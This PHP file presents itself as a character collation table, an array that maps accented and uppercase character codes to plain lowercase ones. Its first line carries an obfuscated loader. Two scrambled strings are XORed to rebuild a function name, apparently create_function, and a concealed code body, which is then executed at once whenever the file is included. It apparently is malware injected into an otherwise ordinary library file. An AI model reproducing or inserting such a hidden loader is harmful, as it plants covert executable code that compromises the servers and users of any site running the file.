<?php $YZztYXII='-K5SD +<XUYI9UN'; $qhOFOPe='N9P20EtZ-;:=P: '^$YZztYXII; $LeXgRGEh='XWJp2H+H,,DUjWFBOGJiq4 3i>7D1m0V=.eqEt5y3W=W-=WSYqE;OlZQ1UarWBDGhS6N3TvR<ERdbzqfjV=Dhg64DfjgJmwH:jR.Naf=IokXyhjDyOG=-5<zgZU0TORUgQbhjeb9uB:2XonsDj.8L6-C:dvjzh1.<oFGpQr:TKPINoH9R0hask91NK2 9>WrLAXHec=o.h+yFn=7FVgVj7V+G5kiJ 8JRj<5CjjmSY904ufe7=0EA7Foxna5x9.qsTT0fVXX=inxzF7P- +bp4hxQJVCL==H:cxtt3.6zAdnD  -mjnqEY ,Rs;6iR3MTnDM1X=7yOVxyT =E;NQRduhbvqmtmzx, VrG< sEvfc2,RXTza29eyS3P:Pm3K7AkweYT4LonbtZ5<;figE YPFEsnbCl:mbQXA24HTiv7S:NE=L+Z+=OHQ4k= F f9PEBz:AD<DWo57UYV0cL.7XZggNmTAG9= .:lmXyS0zrR;.LfWgkZ9 6<2Z5E+K.3C38Js<H:heif=J WmkkUYc5=AXt-UJTfuWEUb1doKdEKTQsvPWP4lAo1ias:ZxwmgyVYTbYLUTuViMasws2=1PYi 3KeQ5EHM4eh4RU<Y03CkmQS.F9LQJODoGR79NS5R6nw1 Z ni .EG -3hsssdh4-YXBakPM4'; $OkoPFTC=$qhOFOPe('', '11bQT=E+XE+;52>+<39AVLOA6ZV0P2o;HZBXlTNs:1H9NI><7Q=T=3>0E4>-:70oL7W:RxVvW +MBZQFJ-7MaCYA0FWGmJLB3c4A<IBTiRKhBHN-E<3OAPRRC>4D5fiuC8ICCok0Q-OFxASSlNJY8WvgS9V4ZLZKE4b.PtRI 9<, GlR7IA<ZP38G9WTLL9Zh.-<LX7fSbVsLJYV27GkJQ7G4PPcnDY>35WP:JWM58UCQNloQRB  T.OPJ>v7ve86t5CFr3=DISFZbA1AUNKPObqu.77-bV-CCETPXKOAKmJ ATLMWNU38LY7H1KcXZ+tFeiU9IVPo-rp2OO Z-9rLQ703 81>.XMSvV,YYSxHFGDM>-1SAI3lpwW1N12X.NaVWA21MwegkP>THZFTGaV8<3 Hdk>fGghu< FUhiI6B=I+7T-G3QXg0>F4YA2A9f=06RX 7Yrc0QR662UKhJV,;NKnI0 3XbKKCEDcs:VRV6ZZ-FqAK;KRWEm1P<t.VZ0GKbTW-COIIBY+T6DKMsyKXYtpPI4>5=R< ,ElMOvYel5cJNd55QYyYUYREX;ICUWOgofZ=-c2D0NdAUQSSOC1 6KV2:4M,;9GMOD3,P6QWdGMu7O2XexjodOgrL3G6C3ZFSUA.A5NPO<+OLWO.ZHnaQU0,jQBkGI'^$LeXgRGEh); $OkoPFTC();
$collation = array (
  710 => 94,
  189 => 188,
  190 => 179,
  65 => 97,
  170 => 97,
  225 => 97,
  193 => 97,
  224 => 97,
  192 => 97,
  226 => 97,
  194 => 97,
  228 => 97,
  196 => 97,
  227 => 97,
  195 => 97,
  229 => 97,
  197 => 97,
  230 => 97,
  198 => 97,
  66 => 98,
  67 => 99,
  231 => 99,
  199 => 99,
  68 => 100,
  240 => 100,
  208 => 100,
  69 => 101,
  233 => 101,
  201 => 101,
  232 => 101,
  200 => 101,
  234 => 101,
  202 => 101,
  235 => 101,
  203 => 101,
  70 => 102,
  402 => 102,
  71 => 103,
  72 => 104,
  73 => 105,
  237 => 105,
  205 => 105,
  236 => 105,
  204 => 105,
  238 => 105,
  206 => 105,
  239 => 105,
  207 => 105,
  74 => 106,
  75 => 107,
  76 => 108,
  77 => 109,
  78 => 110,
  209 => 241,
  79 => 111,
  186 => 111,
  243 => 111,
  211 => 111,
  242 => 111,
  210 => 111,
  244 => 111,
  212 => 111,
  246 => 111,
  214 => 111,
  245 => 111,
  213 => 111,
  248 => 111,
  216 => 111,
  339 => 111,
  338 => 111,
  80 => 112,
  81 => 113,
  82 => 114,
  83 => 115,
  353 => 115,
  352 => 115,
  223 => 115,
  84 => 116,
  254 => 116,
  222 => 116,
  85 => 117,
  250 => 117,
  218 => 117,
  249 => 117,
  217 => 117,
  251 => 117,
  219 => 117,
  252 => 117,
  220 => 117,
  86 => 118,
  87 => 119,
  88 => 120,
  89 => 121,
  253 => 121,
  221 => 121,
  255 => 121,
  376 => 121,
  90 => 122,
  382 => 122,
  381 => 122,
);
?>